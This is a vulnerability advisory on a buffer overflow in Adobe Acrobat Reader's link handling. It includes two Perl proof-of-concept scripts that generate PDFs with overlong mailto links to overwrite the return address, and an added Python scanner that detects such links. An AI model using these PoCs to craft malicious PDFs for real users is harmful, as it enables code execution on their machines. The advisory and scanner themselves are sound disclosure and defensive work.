Buffer Overflow Vulnerability in Adobe Acrobat Reader
1 Jul. 2003
Summary
Acrobat Reader allows anyone to view, navigate, and print documents in the Adobe Portable Document Format (PDF). There is a buffer overflow vulnerability in the WWWLaunchNetscape function. It copies the link address into a 256-byte buffer (in version 5.0.5) until a '\0' is found. If the link is longer than 256 bytes, the return address is overwritten. Note that the user has to click on the link for the overflow to be triggered. The user also has to have Netscape selected as the browser in the Acrobat preferences, but that is the default setting.
Credit:
The information has been provided by the sec-labs team.
Vulnerable systems:
* Adobe Acrobat Reader version 5.0.7
Impact:
If somebody clicks on a link in a .pdf file that was specially prepared by an attacker, malicious code can be executed with the user's privileges.
Exploits:
poc505.pl:
#!/usr/bin/perl
#
# Adobe Acrobat Reader 5.0.5 Buffer Overflow Vulnerability
# PoC exploit by mcbethh / sec-labs
#
# This script will generate poc505.pdf file. Open it in
# adobe acrobat and click on 'click here' link.
# Vulnerable function is WWWLaunchNetscape. Use gdb to see
# that return address was overwritten (by 0x41414141).
open P, ">poc505.tex";
print P '
\documentclass{letter}
\usepackage{hyperref}
\begin{document}
\href{mailto:x'.('X'x252).'AAAA}{\texttt{click here}}
\end{document}';
close P;
system ("pdflatex poc505.tex");
system ("rm -f poc505.tex poc505.out poc505.log poc505.aux");
poc507.pl:
#!/usr/bin/perl
#
# Adobe Acrobat Reader 5.0.7 Buffer Overflow Vulnerability
# PoC exploit by mcbethh / sec-labs
#
# This script will generate poc507.pdf file. Open it in
# adobe acrobat and click on 'click here' link.
# Vulnerable function is WWWLaunchNetscape. Use gdb to see
# that return address was overwritten (by 0x41414141).
open P, ">poc507.tex";
print P '
\documentclass{letter}
\usepackage{hyperref}
\begin{document}
\href{mailto:x'.('X'x508).'AAAA}{\texttt{click here}}
\end{document}';
close P;
system ("pdflatex poc507.tex");
system ("rm -f poc507.tex poc507.out poc507.log poc507.aux");
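As an added defensive example (not part of the advisory and not sec-labs' code), the Python checker below flags PDF link targets longer than the 256-byte buffer the summary describes, which is the shape both PoC files produce. It scans the raw file and also inflates Flate-compressed streams, so a long target stored in an object stream is still found. The sample PDF it builds is constructed here to mimic the poc505 target ("mailto:x" + 252 "X" + "AAAA", 264 bytes); the function names and the default threshold are this example's own choices, and the threshold should be tuned per product version.

```python
import re
import zlib

# From the advisory: the 5.0.5 WWWLaunchNetscape buffer holds 256 bytes, so any
# link target longer than that can overwrite the saved return address.
DEFAULT_LIMIT = 256

_URI_KEY = re.compile(rb"/URI\s*(?=[(<])")          # /URI followed by a string
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.DOTALL)


def _read_literal(blob: bytes, start: int) -> bytes:
    """Decode a PDF literal string starting at blob[start] == '('.

    Handles backslash escapes (\\n, \\), \\\\, octal) and balanced nested
    parentheses, so the length measured is that of the real link target."""
    simple = {ord("n"): 10, ord("r"): 13, ord("t"): 9, ord("b"): 8, ord("f"): 12}
    out, depth, i = bytearray(), 1, start + 1
    while i < len(blob) and depth:
        c = blob[i]
        if c == 0x5C:                      # backslash escape
            i += 1
            if i >= len(blob):
                break
            n = blob[i]
            if n in simple:
                out.append(simple[n]); i += 1
            elif 0x30 <= n <= 0x37:        # up to three octal digits
                j = i
                while j < len(blob) and j - i < 3 and 0x30 <= blob[j] <= 0x37:
                    j += 1
                out.append(int(blob[i:j], 8) & 0xFF); i = j
            elif n in (0x0A, 0x0D):        # escaped line break: dropped
                i += 1
            else:                          # \( \) \\ and unknown escapes
                out.append(n); i += 1
        else:
            if c == 0x28:
                depth += 1
            elif c == 0x29:
                depth -= 1
            if depth:
                out.append(c)
            i += 1
    return bytes(out)


def _read_hex(blob: bytes, start: int) -> bytes:
    """Decode a PDF hex string starting at blob[start] == '<'."""
    end = blob.find(b">", start)
    digits = re.sub(rb"\s", b"", blob[start + 1:end])
    if len(digits) % 2:
        digits += b"0"                     # PDF pads an odd final digit with 0
    return bytes.fromhex(digits.decode("ascii"))


def scan_pdf(pdf: bytes, limit: int = DEFAULT_LIMIT) -> list:
    """Return (length, preview) for every /URI link target longer than `limit`.

    Flate-compressed streams are inflated and scanned as well, since annotation
    dictionaries may live inside object streams in newer PDF files."""
    blobs = [pdf]
    for m in _STREAM.finditer(pdf):
        try:
            blobs.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass                           # not Flate data; raw bytes were scanned anyway
    findings = []
    for blob in blobs:
        for m in _URI_KEY.finditer(blob):
            pos = m.end()
            if blob[pos] == 0x28:
                target = _read_literal(blob, pos)
            elif blob[pos:pos + 2] != b"<<":
                target = _read_hex(blob, pos)
            else:
                continue                   # "/URI <<" would be a dictionary, not a string
            if len(target) > limit:
                findings.append((len(target), target[:32]))
    return findings


# Constructed sample, not a real PoC file: one benign link (with an escaped
# parenthesis), one link shaped like the poc505 target, and the same long
# target inside a Flate-compressed stream.
LONG_TARGET = b"mailto:x" + b"X" * 252 + b"AAAA"


def build_sample_pdf() -> bytes:
    compressed = zlib.compress(b"<</S/URI/URI(" + LONG_TARGET + b")>>")
    return (b"%PDF-1.4\n"
            b"1 0 obj <</Type/Annot/Subtype/Link/A<</S/URI/URI(https://example.org/a\\)b)>>>> endobj\n"
            b"2 0 obj <</Type/Annot/Subtype/Link/A<</S/URI/URI(" + LONG_TARGET + b")>>>> endobj\n"
            b"3 0 obj <</Length " + str(len(compressed)).encode() + b"/Filter/FlateDecode>>\n"
            b"stream\n" + compressed + b"\nendstream endobj\n"
            b"%%EOF\n")


if __name__ == "__main__":
    for length, preview in scan_pdf(build_sample_pdf()):
        print(f"link target of {length} bytes exceeds {DEFAULT_LIMIT}: {preview!r}...")
```

To check a file produced by the scripts above, call scan_pdf(open("poc505.pdf", "rb").read()); the two constructed hits in the sample are both 264 bytes long, and raising the limit to 512 clears them.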